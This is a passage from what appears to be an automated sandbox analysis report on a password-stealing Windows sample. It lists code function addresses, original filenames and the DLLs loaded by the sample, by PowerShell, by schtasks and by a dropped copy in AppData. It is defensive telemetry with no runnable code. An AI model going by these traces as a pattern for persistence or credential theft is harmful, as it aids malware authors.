                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 0_2_052B0D590_2_052B0D59
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 0_2_052B79D80_2_052B79D8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 0_2_070E97980_2_070E9798
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 0_2_070EB6D20_2_070EB6D2
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 0_2_070EB6E00_2_070EB6E0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 0_2_070EA4400_2_070EA440
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 0_2_070EA0080_2_070EA008
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 0_2_070E0C990_2_070E0C99
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 0_2_070E0CA80_2_070E0CA8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 0_2_070E9BC20_2_070E9BC2
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 0_2_070E9BD00_2_070E9BD0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 0_2_0B7F00400_2_0B7F0040
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 0_2_0B7F00400_2_0B7F0040
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 0_2_0B7F00070_2_0B7F0007
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 9_2_030DC7B09_2_030DC7B0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 9_2_030D4AC09_2_030D4AC0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 9_2_030DD0E79_2_030DD0E7
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 9_2_030D3EA89_2_030D3EA8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 9_2_030D41F09_2_030D41F0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 9_2_06FDDE109_2_06FDDE10
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 9_2_06FD59809_2_06FD5980
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeCode function: 10_2_01764B3910_2_01764B39
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeCode function: 10_2_0768ED6810_2_0768ED68
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeCode function: 10_2_0768979810_2_07689798
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeCode function: 10_2_0768B6E010_2_0768B6E0
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeCode function: 10_2_0768B6D310_2_0768B6D3
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeCode function: 10_2_0768A44010_2_0768A440
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeCode function: 10_2_0768A00810_2_0768A008
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeCode function: 10_2_0768ED5910_2_0768ED59
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeCode function: 10_2_07680CA810_2_07680CA8
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeCode function: 10_2_07680C9910_2_07680C99
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeCode function: 10_2_07689BC310_2_07689BC3
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeCode function: 10_2_07689BD010_2_07689BD0
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeCode function: 10_2_0768ED6810_2_0768ED68
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeCode function: 14_2_01334AC014_2_01334AC0
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeCode function: 14_2_0133D0E714_2_0133D0E7
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeCode function: 14_2_01333EA814_2_01333EA8
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeCode function: 14_2_013341F014_2_013341F0
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeCode function: 14_2_069FDE1014_2_069FDE10
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeCode function: 14_2_069F598014_2_069F5980
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000000.00000002.2148269661.0000000007130000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000000.00000002.2145030822.0000000002E18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename3e301610-77d9-4d01-8699-0e498c12f7fa.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000000.00000000.2100144872.000000000098C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesKdvLcn.exe" vs SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000000.00000002.2142658019.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000000.00000002.2146302322.000000000400E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename3e301610-77d9-4d01-8699-0e498c12f7fa.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000000.00000002.2146302322.000000000400E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3366131390.0000000001358000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeBinary or memory string: OriginalFilenamesKdvLcn.exe" vs SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeSection loaded: edputil.dllJump to behavior
